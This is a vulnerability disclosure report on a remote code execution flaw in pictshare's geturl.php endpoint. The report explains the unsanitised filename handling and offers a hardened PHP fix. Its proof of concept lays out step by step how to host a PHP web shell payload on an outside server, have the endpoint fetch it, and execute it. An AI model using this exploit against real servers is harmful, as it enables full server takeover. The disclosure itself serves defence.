Code Injection in HaschekSolutions/pictshare

Valid
Reported on Jun 7th 2021

✍️ Description

Hi, there is a remote code execution vulnerability in pictshare in /api/geturl.php:

$url = trim($_REQUEST['url']);

if(!$url || !startsWith($url, 'http'))
    exit(json_encode(array('status'=>'err','reason'=>'Invalid URL')));
    
/**/

$name = basename($url);
$tmpfile = ROOT.DS.'tmp'.DS.$name;
file_put_contents($tmpfile,file_get_contents($url)); // write-what-where primitive!

The script downloads the content of $url and writes it to $tmpfile, whose path is built from $name, which is simply basename($url).

The only check on $url is that it starts with "http"; there is no check at all on $name or on the downloaded content.

If $url is equal to https://my_server.com/shell.php, then $name will be shell.php.

The file shell.php will then be placed in the tmp folder inside the pictshare application. Because that folder is served by the web server, the shell is accessible (and executed) by anyone.
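For comparison, here is a hardened version of that download step. This is an added example, not pictshare's own code or its eventual fix; it assumes the same ROOT and DS constants as the snippet above and a 20 MiB size limit chosen for illustration.

```php
<?php
// Added hardening example (not pictshare's code). ROOT and DS are assumed to be
// the application's root path and directory separator as in the original snippet.

function fetch_remote_image(string $url): string
{
    // Accept only absolute http(s) URLs with a host; a plain "starts with http"
    // check also lets through things like "httpfoo" or "http:/x".
    $parts = parse_url($url);
    if ($parts === false || empty($parts['host'])
        || !in_array(strtolower($parts['scheme'] ?? ''), ['http', 'https'], true)) {
        throw new RuntimeException('Invalid URL');
    }

    // Bound the download: short timeout, no redirects, max 20 MiB (assumed limit).
    $ctx  = stream_context_create(['http' => ['timeout' => 10, 'follow_location' => 0]]);
    $data = file_get_contents($url, false, $ctx, 0, 20 * 1024 * 1024);
    if ($data === false || $data === '') {
        throw new RuntimeException('Download failed');
    }

    // Derive the extension from the bytes, never from the URL. Note this alone is
    // not sufficient: a file can be a valid image and still carry PHP code, so the
    // server-chosen name below and a no-execute tmp directory are the real controls.
    $allowed = [IMAGETYPE_JPEG => 'jpg', IMAGETYPE_PNG => 'png', IMAGETYPE_GIF => 'gif'];
    $info    = @getimagesizefromstring($data);
    if ($info === false || !isset($allowed[$info[2]])) {
        throw new RuntimeException('Not a supported image');
    }

    // Random, server-generated filename: basename($url) is never used, so the
    // attacker cannot choose the name or the extension.
    $name    = bin2hex(random_bytes(16)) . '.' . $allowed[$info[2]];
    $tmpfile = ROOT . DS . 'tmp' . DS . $name;

    if (file_put_contents($tmpfile, $data, LOCK_EX) === false) {
        throw new RuntimeException('Write failed');
    }
    return $tmpfile;
}
```

As defence in depth, the tmp directory should also be configured so the web server never executes PHP from it (for example `php_flag engine off` in an Apache .htaccess, or an nginx location that serves it as static files only).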

🕵️‍♂️ Proof of Concept

Set up a webserver, or set up a mock API server like beeceptor.

Serve a file named hello.php with this content: <?php echo system("id");?>

Visit your pictshare instance at http://192.168.169.103/pictshare/api/geturl.php?url=https://h0rez.free.beeceptor.com/hello.php

The server will download hello.php and place it in the tmp folder of pictshare.

Then visit http://192.168.169.103/pictshare/tmp/hello.php

💥 Impact

Remote code execution, complete takeover of the server running this tool :)